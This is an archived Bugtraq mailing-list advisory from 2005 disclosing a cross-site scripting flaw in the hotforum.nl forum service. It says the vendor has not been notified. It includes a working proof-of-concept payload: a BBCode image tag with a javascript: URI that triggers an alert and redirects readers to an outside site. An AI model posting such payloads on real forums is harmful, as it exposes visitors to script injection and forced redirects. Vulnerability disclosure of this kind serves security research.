Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

...::: hotforum.nl XSS exploit :::...

From: Rebyte Security <rebyte () walla com>
Date: 12 Mar 2005 23:59:16 -0000




               hotforum.nl XSS exploit
             ---------------------------
              * 13 march 2005
              * Discovered by Qon^Rebyte


..:: STATUS ::..
______________________________________________________________________

hotforum.nl has not yet been notified about this exploit


..:: VULNERABLE ::..
______________________________________________________________________

All hotforums, because it's an on line service.
Once the service is patched all hotforums will be immune.


..:: EXPLOIT ::..
______________________________________________________________________

Risk: Low/Medium
Type: Input Validation Error
What: Input JS code

Proof of Concept
----------------

Post this:

**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/&apos;);[/img]
**********************************************************************

This will alert following message:
"hotforum.nl xss exploit - by Qon^Rebyte"

and redirect to another site:
"http://dhost.info/recall/rebyte/";


..:: CREDITS ::..
______________________________________________________________________

This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)

 Greetings fly out 2
---------------------
    * Rebyte Security  : because it rox :)
    * Mr.Manson        : Rebyte co-admin
    * Bugtraq          : for doing a great job


         *** Qon ^ Rebyte ***


-- http://dhost.info/recall/rebyte/ --
---------- rebyte () walla com ----------
Previous By Date Next
Previous By Thread Next

Current thread: